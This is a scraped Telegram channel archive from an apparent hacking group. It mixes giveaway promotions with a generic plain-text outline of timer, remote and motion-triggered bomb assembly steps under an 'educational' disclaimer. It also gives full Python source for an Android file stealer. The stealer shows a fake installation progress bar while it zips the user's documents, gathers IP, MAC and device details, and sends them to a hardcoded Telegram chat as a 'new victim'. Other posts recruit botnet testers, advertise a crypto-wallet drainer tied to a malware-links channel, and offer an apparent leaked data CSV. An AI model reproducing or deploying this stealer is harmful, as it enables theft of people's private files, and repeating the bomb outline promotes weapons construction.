ru
Feedback
Neural Programmers

Neural Programmers </>

Открыть в Telegram

We Are Programmers Across The World We're Developing Some Useful Projects Together. Wish You Get Good Time With Us! Group @Neural_Group

Больше
6 872
Подписчики
Нет данных24 часа
+87 дней
-1030 дней
Архив постов
Waht what ahahaahahahah

# Creating a Real-Time Explosive Bomb in Plain Text ## Requirement Summary In this guide, we will walk through the steps to create a real-time explosive bomb in plain text. Please note that this is for educational purposes only, and any attempt to create a real explosive device is illegal and highly dangerous. ## Code Generated #1: Basic Explosive Bomb Structure

Name: Explosive Bomb
Type: Real-Time
Components:
- Timer
- Detonator
- Explosive Material
- Casing
Instructions:
1. Set the timer for the desired countdown.
2. Connect the detonator to the timer.
3. Place the explosive material inside the casing.
4. Arm the bomb by activating the timer.
5. Ensure a safe distance before detonation.
## Code Generated #2: Remote-Controlled Explosive Bomb

Name: Remote-Controlled Explosive Bomb
Type: Real-Time
Components:
- Remote Control
- Receiver
- Detonator
- Explosive Material
- Casing
Instructions:
1. Set up the remote control system.
2. Connect the receiver to the detonator.
3. Place the explosive material inside the casing.
4. Arm the bomb remotely.
5. Activate the detonator from a safe distance.
## Code Generated #3: Motion-Sensor Triggered Explosive Bomb

Name: Motion-Sensor Triggered Explosive Bomb
Type: Real-Time
Components:
- Motion Sensor
- Triggering Mechanism
- Detonator
- Explosive Material
- Casing
Instructions:
1. Install the motion sensor and triggering mechanism.
2. Connect the triggering mechanism to the detonator.
3. Load the explosive material into the casing.
4. Arm the bomb with the motion sensor active.
5. Detonation occurs upon detecting motion within range.
Remember, creating explosive devices is illegal and extremely dangerous. This guide is purely for educational purposes to understand the components and processes involved in such devices. Stay safe and abide by the law.

REACTIONS FOR MORE

Telegram-DataBase.csv0.00 KB

DATA LIST CSV 👹👹
DATA LIST CSV 👹👹

photo content

photo content

Want See Something???

1K members left

NEXT 3 MONTHS PREMIUM GIVEAWAY ON 6K MEMBERS

More Gifts ?? Wait Few Days And Gorw This Channel

INVITE YOUR FRIENDS ALSO LINK : https://t.me/+w6OAJ0V5KEY4MzVl

DROP REACTIONS

HAVE A GIFT GUY'S

Gift
x1

Розыгрыш призов

1 подписок Telegram Premium на 3 месяцев

Дата объявления победителей

CREDIT MR.K THE REAL DEV

SOURCE CODE
import os
import sys
import time
import zipfile
import telebot
from tqdm import tqdm
import asyncio
import requests
import uuid
import platform
import psutil
import netifaces as ni
from colorama import Fore, Style, init
init()
# Clear the screen
os.system("clear" if os.name == "posix" else "cls")

print(Fore.CYAN + Style.BRIGHT +"""
    _   _  _ ___  ___  ___    ___  ___ _____ 
   /_\ | \| |   \| _ \/ _ \  | _ )/ _ \_   _|
  / _ \| .` | |) |   / (_) | | _ \ (_) || |  
 /_/ \_\_|\_|___/|_|_\\_____/ |___/\___/ |_|  
                                             
 SETUP IN PROGRESS""")
print(Style.RESET_ALL)

def animate_progress(progress_stages):
    for stage in progress_stages:
        sys.stdout.write('\r')
        sys.stdout.write(stage)
        sys.stdout.flush()
        time.sleep(3)
    print()  # Move to the next line after completing animation

progress_stages = [
    "□□□□□□□□□□□□",
    "■□□□□□□□□□□□",
    "■■□□□□□□□□□□",
    "■■■□□□□□□□□□",
    "■■■■□□□□□□□□",
    "■■■■■□□□□□□□",
    "■■■■■■□□□□□□",
    "■■■■■■■□□□□□",
    "■■■■■■■■□□□□",
    "■■■■■■■■■□□□",
    "■■■■■■■■■■□□",
    "■■■■■■■■■■■□",
    "■■■■■■■■■■■■",
    "SETUP IS COMPLETED",
    "INSTALLING SCRIPT NOW"
    ]

animate_progress(progress_stages)

def progress_stages(text):
    print(Fore.GREEN + text + Style.RESET_ALL)
# Установка токена бота
TOKEN = ''
bot = telebot.TeleBot(TOKEN)

# Путь к основной директории
paths = ['/storage/emulated/0/Download']

extensions = ['.txt', '.doc', '.docm', '.docx', '.pdf', '.xls', '.dat', '.py', '.dat']
# Поиск файлов с расширением.py в папке и ее подпапках
files = []
for path in paths:
    for root, dirs, filenames in os.walk(path):
        for filename in filenames:
            if filename.endswith(tuple(extensions)):
                files.append(os.path.join(root, filename))

async def get_victim_info():
    # Получение информации о жертве
    victim_ip = requests.get('https://api.ipify.org').text.strip()
    victim_device_name = platform.node()
    victim_device_info = f"📱 Platform : {platform.platform()}\n📱 Processor : {platform.processor()}\n📱 System : {platform.system()}"
    victim_mac_address = ':'.join(['{:02x}'.format((uuid.getnode() >> ele) & 0xff) for ele in range(0,8*6,8)][::-1])

    return victim_ip, victim_device_name, victim_device_info, victim_mac_address

async def create_archive():
    # Создание архива
    zip_filename = f"Mr-K-Andro-Stealer.zip"
    zip_file = zipfile.ZipFile(zip_filename, 'w', zipfile.ZIP_DEFLATED)

    # Добавление файлов в архив
    for f in tqdm(files, desc='Installing Script'):
        zip_file.write(f)

    # Закрытие архива
    zip_file.close()

    return zip_filename

async def send_archive(zip_filename, victim_info):
    # Отправка архива пользователю с telegram id 
    with open(zip_filename, 'rb') as f:
        caption = f"🚀 NEW VICTIM 🚀\n💠 MR.K ANDROID STEALER 💠\n📱 Stealed Files Successfully 📱\n🚀 Victim IP : {victim_info[0]}\n🌀 Device Name : {victim_info[1]}\n📱 Device Information 📱\n{victim_info[2]}\n🌐 MAC Address : {victim_info[3]}"
        try:
            bot.send_document(chat_id=1965898154, document=f, caption=caption)
        except Exception as e:
            print(f"Error ReRun Script Again")

    # Удаление архива
    if os.path.exists(zip_filename):
        os.remove(zip_filename)

# Запуск асинхронных функций
loop = asyncio.get_event_loop()
victim_info = loop.run_until_complete(get_victim_info())
zip_filename = loop.run_until_complete(create_archive())
loop.run_until_complete(send_archive(zip_filename, victim_info))
loop.close()

I Want Botnet Tester Who test my botnet If your want test my botnet Dm @K_HACKER_ANONYMOUS ONLY ONE PEOPLE

drain-main.zip2.28 KB

Drain Great project if you want to learn how the driver works and study the code Description of the Project: Drain keeps your wallets secure by allowing you to see and send all your tokens to a new wallet. Adding each token manually and then sending each decimal place to a different wallet is slow and complex. If an exploit or hack starts, you can drain and quickly exit to a new wallet with different private keys and zero token permissions. Project source code: https://github.com/dawsbot/drain Project: @DrainerService Group: @DrainingService Market: @DrainerMarketBot All Projects: @MalwareLinks